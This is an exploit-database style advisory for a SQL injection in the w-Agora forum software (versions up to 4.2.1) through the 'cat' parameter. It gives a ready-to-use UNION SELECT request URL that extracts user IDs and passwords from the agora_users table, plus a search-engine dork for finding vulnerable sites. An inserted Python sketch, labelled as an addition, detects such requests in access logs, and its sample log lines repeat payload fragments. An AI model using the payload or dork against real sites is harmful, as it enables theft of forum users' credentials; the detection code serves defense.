# Title : w-Agora <= 4.2.1 (cat) Remote SQL Injection Vulnerability
# Published : 2007-12-30
# Author : IHTeam
#########################################################################################
#
# [W-Agora <= 4.2.1]
#
# Class: SQL Injection
# Found: 30/12/2007
# Remote: Yes
# Site: http://w-agora.net
# Download: http://sourceforge.net/project/showfiles.php?group_id=3413
# Author: R00T[ATI]
# Contact: r00t.ati@ihteam.net - http://www.ihteam.net
#
#########################################################################################
Exploit :
===================================================================================================================================================================================================================
http://site.com/[w-agora_path]/index.php?site=[site_name]&cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat(userid,0x3a,password),24/**/FROM/**/agora_users/*
===================================================================================================================================================================================================================
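Detection sketch for the request shape above, added here as an example and not part of the original advisory or of w-Agora: it scans web access-log lines for a `cat` parameter that carries UNION SELECT once `/**/` comment padding and URL encoding are normalized. The log lines, paths, IPs and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (not from the advisory); paths and IPs are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Dec/2007:10:00:01 +0000] "GET /forum/index.php?site=credit_union&cat=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [30/Dec/2007:10:00:05 +0000] "GET /forum/index.php?site=demo&cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2/* HTTP/1.1" 200 812',
    '198.51.100.7 - - [30/Dec/2007:10:00:09 +0000] "GET /forum/index.php?site=demo&cat=-1%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F1 HTTP/1.1" 200 812',
    '192.0.2.11 - - [30/Dec/2007:10:00:12 +0000] "GET /forum/index.php?site=demo&cat=general HTTP/1.1" 200 4096',
]

# Closed /* ... */ comments (used in place of spaces) or a trailing unterminated /*.
_COMMENT = re.compile(r"/\*.*?\*/|/\*.*$", re.S)
_UNION_SELECT = re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)
_REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalize(value):
    """Replace SQL comments with a space and collapse runs of whitespace."""
    return re.sub(r"\s+", " ", _COMMENT.sub(" ", value)).strip()

def inspect_cat(url):
    """Return a reason string if the cat parameter looks like injection, else None."""
    # parse_qsl percent-decodes values, so encoded comment markers are seen too.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name != "cat":
            continue  # only the parameter named in the advisory is inspected
        if _UNION_SELECT.search(normalize(value)):
            return "UNION SELECT in cat"
        if "/*" in value:
            return "SQL comment in cat"
    return None

def scan(log_lines):
    """Return (line_number, reason) for every flagged access-log line."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = _REQUEST.search(line)
        if m:
            reason = inspect_cat(m.group(1))
            if reason:
                hits.append((n, reason))
    return hits

if __name__ == "__main__":
    for n, reason in scan(SAMPLE_LOG):
        print(f"line {n}: {reason}")
```

A hit on line 1 would be a false positive (`credit_union` is in `site`, not `cat`); the scan only reports lines 2 and 3.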
Thanks To:
=========================
All ihteam.net members;
=========================
DORK: allinurl:"index.php?site=" "W-Agora"
#ihteam.net - Inclusion Hunter Team
# www.Syue.com [2007-12-30]